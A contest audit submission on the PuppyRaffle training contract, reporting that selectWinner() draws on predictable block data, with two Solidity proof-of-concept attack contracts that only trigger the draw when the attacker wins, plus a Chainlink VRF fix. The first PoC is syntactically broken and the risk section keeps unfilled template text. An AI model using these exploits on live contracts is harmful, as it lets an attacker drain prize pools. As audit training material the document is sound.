Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Weak Randomness Allows Winner Prediction and Manipulation

ravigaikar88

Root + Impact

Description

  • The selectWinner() function uses easily predictable on-chain data (msg.sender, block.timestamp, block.difficulty) for randomness. Block.difficulty is deprecated and returns prevrandao post-merge, which validators know in advance. An attacker can calculate the winner before calling selectWinner() and only call it when they would win. Additionally, miners/validators can manipulate these values within constraints to influence outcomes.

// Root cause in the codebase with @> marks to highlight the relevant section
function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
// ... rest of function
}

Risk

Likelihood:

  • Reason 1 // Describe WHEN this will occur (avoid using "if" statements)

  • Reason 2

Impact:

  • Attackers can guarantee they win the raffle by only calling selectWinner() when the pseudo-random calculation would select them. This completely undermines the fairness of the raffle and allows systematic exploitation of the prize pool.

    • Any participant can manipulate the raffle outcome.

    • Predictable randomness makes the system unsafe for real gambling or prize distribution.

    • Users have a high risk of losing ETH to a manipulative participant.

Proof of Concept

The PuppyRaffle contract selects the winner like this:

Weakness:

  • msg.sender, block.timestamp, and block.difficulty are predictable or controllable to some extent.

  • An attacker can:

    1. Enter the raffle with multiple addresses.

    2. Compute which address would be selected using the same hash.

    3. Only trigger selectWinner() if one of their addresses wins.

contract WinnerManipulator {
PuppyRaffle public puppyRaffle;
function enterAndWin() external payable {
// Enter raffle with multiple addresses
address ;
for(uint i = 0; i < 4; i++) {
myAddresses[i] = address(uint160(address(this)) + i);
}
puppyRaffle.enterRaffle{value: puppyRaffle.entranceFee() * 4}(myAddresses);
// Wait for raffle duration
// Then calculate if we would win
uint256 winnerIndex = uint256(keccak256(abi.encodePacked(
address(this),
block.timestamp,
block.difficulty
))) % puppyRaffle.players.length;
address potentialWinner = puppyRaffle.players(winnerIndex);
// Only select winner if it's one of our addresses
for(uint i = 0; i < 4; i++) {
if(potentialWinner == myAddresses[i]) {
puppyRaffle.selectWinner();
break;
}
}
}
}

Recommended Mitigation

  1. Use secure, verifiable randomness, e.g.:

    • Chainlink VRF

    • Commit-reveal scheme


  2. Never rely on:

    • block.timestamp

    • block.difficulty

    • msg.sender

  3. Optionally, enforce one entry per user or on-chain entropy.

- remove this code
+ add this code
-function selectWinner() external {
- require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
- require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
- uint256 winnerIndex =
- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
- address winner = players[winnerIndex];
- // ... rest of function
-}
+function selectWinner() external {
+ require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
+ require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
+ requestRandomness(keyHash, fee);
+}
+
+function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {
+ uint256 winnerIndex = randomness % players.length;
+ // ... rest of winner selection logic
+}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!